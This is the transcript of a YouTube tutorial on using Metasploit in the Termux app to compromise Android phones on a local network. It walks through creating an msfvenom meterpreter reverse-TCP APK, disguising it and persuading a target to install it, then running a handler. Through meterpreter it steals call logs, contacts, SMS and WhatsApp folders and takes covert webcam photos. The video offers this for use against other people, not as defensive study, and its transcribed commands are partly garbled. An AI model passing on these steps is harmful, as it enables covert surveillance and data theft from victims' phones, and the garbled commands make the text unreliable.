So guys, today in this video I want to show you how to use the Metasploit framework in the Termux app to hack an Android phone. So in my last video I shown you how to install the Metasploit framework in the Termux app, but I did not show you how to use it for hacking any Android device. But in this video I will show a step-by-step tutorial on how to use the Metasploit framework to hack an Android phone. So there will be two videos in this series. The first video on how to attack an Android phone over the local area network, and the next one will be how to attack an Android phone over the wide area network. So the difference between two videos is that when you want to attack an Android phone which is connected to the same network in which you are, for example, if your target device is connected to your hotspot, or if you are connected to the hotspot of your target device, or if both of them connected to the same Wi-Fi network, then you have to use the first method, that is attack over the local area network. But if your target device is not connected to the same network in which you are, then you have to wait for my next video in which I will show how to attack an Android phone over the internet or over the wide area network. So that video will also contain the method of port forwarding without having a router. So you will just need a smartphone to do that. So you have to wait for my next video. So now let's understand this video. So first you need to install the Metasploit framework in your Termux app. So if you did not do this, just watch my previous video and do that. And after that you need to open the Termux app. Here you can see. This is my Termux app. Here you can see. So first I will need to create a payload or a Venom. So it is simply a virus which will help us to connect to our target device. So we will need to just send that particular virus to your target device and just make him to install that. So now you have to create a payload. So to create a payload, you simply need to go to the folder of the Metasploit framework to use the tool of Metasploit. So first you need to type a command here ls and hit enter. So it will show the directory in which I am right now. Here you can see this directory contains these folders. So if you want to use any particular tool, you have to go to the directory in which it is present. For example, I want to use the Metasploit framework, so I have to go to the folder in which the Metasploit framework contains. So you can see this is the folder in which all the tools of the Metasploit framework contain. So I will go to this folder. So to go to any folder, you need to just type here cd. So cd means change directory. So it will change the directory in which I am right now. So I wanted to change my directory to the Metasploit framework 4.14.28. So I will type here cd and Metasploit. So it's simply a folder name of the Metasploit framework. So if you wanted to go to any other directory, for example, if you wanted to go to the download directory, you need simply type here cd, and in the place of Metasploit framework, you need to just type here download. So let me type the full name here, Metasploit framework. .14.28. And make sure that this command is case sensitive. It means that here is the Metasploit framework in the small letter, so I will have to type here Metasploit framework in the small letter. So now you can say I type the cd and Metasploit framework 4.14.28. Now I will hit enter. So now I am in the folder of the Metasploit framework 4.14.28. I will type here ls to show the files is contained. Here you can see. So these are the files which is contained in this Metasploit framework 4.14.28. Here you can see it has MSF Venom. MSF console will also present here. You can see. So these are the modules which you need to attack on any Android phone. So if you do not go to this particular folder, you will not able to use any of them. So you need to go to that particular folder. Now I will create a payload here. So to create a payload, simply need to type here dot and slash, and now type here MSF Venom. -p Android meter reverse TCP. So here P indicates that I wanted to create a payload, and which type of payload is this? So it will be the Android payload. So you can also create a payload for Windows operating system, but I am going to attack on the Android operating system. So I will simply type here -p and Android, and after that meter reverse TCP, and after that you need to type here lhost. Type here lhost in the capital. And equal to sign. Now you have to give here some value. So to know the value of your smartphone, simply slide from here and go to the new session and type here ifconfig. It is the same command which you use on your Kali Linux. So just type it here. Now you can see here is the address of init address. Here you can see. So you need to copy this particular address. Just simply click on the copy, and now go back to your the previous terminal, and you have to type, so simply need to pass that copied text and now you have to type here L port. So give it a value 444, and now just hit space and type here R and just a sign of open angle, and now give this location in which you want to save that particular payload. So I wanted to save it in my SD card, so I will type here SD card and just give a name to your payload. So I wanted to give a name like test.apk. So you can give it any name. So I just given a name test.apk and hit enter. So it will take some time to create a payload, so you have to wait for a while. So it will be saved in the direction in the location which you given here. So make sure that if you wanted to use any tool, you need to go to the particular directory in which that tool contains. So this is the basic of the Termux app. So you need to understand, and you also need to understand some basic commands like cd. Cd means change directory, ls means it will show the list of files in which you are, and the cp means copy command, and mv means move command. So I will also make a separate video on the basic commands of the Termux app, or the basic commands of a Linux-based operating system. Here you can see the payload size is this, and the creation of the Venom is completed. So you need to go to my file manager, and here I will show the payload is saved right now. Here you can see. So you can see this is the payload, and you need to just send this payload to your target device and just convince him to install it. So you can also change the name and just give it a logo and just make it more convincing to install it. So to do this, you need to simply install the APK Editor Pro tool. So I will just put down the link of that APK Editor, so you will directly download from there. Now you have to open your Termux app again, and now you have to type here /MSF console. Okay, and hit enter. So if you're trying to use the MSF console in the new session, then you have to type again this command, that is cd Metasploit Framework 4.14.28. So it will make you go into the folder in which MSF console contain. Now you have to type the ./MSF console. So currently I'm in the directory of Metasploit Framework, so I will not do it again. So you can see it is starting the Metasploit Framework console. So you have to wait for a while. So this attack is only for those Android phones which is connected to the same network in which you are. So if you wanted to attack on any Android phone over the internet, so you have to wait for my next video. So you can see the MSF console is started right now. So now you have to give some commands here. So just click here and now type here use exploit multi-handler. Use exploit multi-handler and hit enter. Okay, now you have to give here set payload Android meterpreter /reverse TCP. Okay, set payload Android meterpreter reverse TCP. These are the same commands that you normally use on your PC Kali Linux. So just type it here and just hit enter. Now you have to give it a local host. So just type here set lhost and space. Now you have to just pass that particular command that you copied earlier, that is this command, this text 127.0.01. So just go there and just pass it here and hit enter. Now you have to type here set lport and just give the same lport that which you given in the formation of the payload. So just type here 44 and hit enter. Now you have to wait for your target device to install your payload. So you can see this is my virus data I wanted to send to my target device, and when that target device will install your payload and open it, the meterpreter session will be stabilized. You can see. So when I click on the open, Then you can see exploit. You can see it's starting the payload handler. So you can see the MetaPeter session is one opened. So when your target device will install your virus and open it, so that particular connection will automatically stabilize. So now you have to understand the commands that you can use here. So simply type here help. So it will show all the commands that you can use here. So these are the commands that you can use here. You can see. So when you type here background, so it will show all the background current session, and when you type here ls, it will show all the files in your target's SD card. And when you type the download and give the folder name which you want to download, so by using this method you can download any particular folder of your target device. For example, you can download a WhatsApp folder and just decrypt all the messages given here. So it will be helpful to attack any WhatsApp account from your Android phone. So you can see you can also move some file from your target device. You can also upload a file to your target device. So these are the commands that you need to understand, and just try all the commands. And here you can see there are so many commands given here. For example, this command, that is webcam snap. So this command is very helpful because when you type the webcam snap, it will automatically take photos from your target device. So that photo will be live photo. For example, I will just type here webcam snap, and when I hit enter, you can see it's just taken a photo from my phone. This is the photo. Let me go to my target device. My Termex app. So you can also take a live photo from your target device. So just simply type this command, and you can also get a live camera streaming from your target device. So simply you type the command webcam stream, and you can also do so many things like here there are check root. So you can check if your target device is rooted or not. So just type here check root and hit enter. You can see device is rooted. So you can do many things from this here. So these are the commands that you need to understand, and just try all the commands. And here you can see this is the dumb call log. So you can get all the call logs from your target device. So you can see which calls is coming from other phones to that particular phone, or whom he called. So all will get from here. And you can also type the command dump context. So you will get the context list of your target device. If you type the dump SMS, so you will get all the SMSs file from your target device. So it's very useful method. So you can also see there is a set audio mode. So it will just change your Android your target device from silent to the general mode. For example, here you can see this is my smartphone is in the mute condition. So when I type the command here set audio mode, and when I will hit enter, you can see ringer mode was changed to 1. So when I go to my notification panel, you can see the silent mode has been converted into the sound profile. So it means that my Android phone is converted to a general profile. So you can remotely control the whole function of the your target device just by installing the that particular Venom to their phone, and you just need to use the MSF console to connect to it. So that's all guys in this video, and in the next video it's very enjoyable for you because I will show you how to do the port forwarding without having a router directly from your Android phone, and how to attack over the internet, over the wide area network by using your smartphone. So you will not need a PC, and you will not need to install a Kali Linux in your PC. You simply need a Termex app and a Metasploit framework installed in it. So just wait for my next video, which will come tomorrow or a day after tomorrow. Within this week, that video will be also uploaded. So thanks guys for watching my video, and if you have any question regarding this video, so please comment down below, so I will help you there. So thanks guys for watching my video, and if you are new to our channel, please subscribe to our YouTube channel. Thanks guys for watching my video. Have a good day, good luck, bye, take care.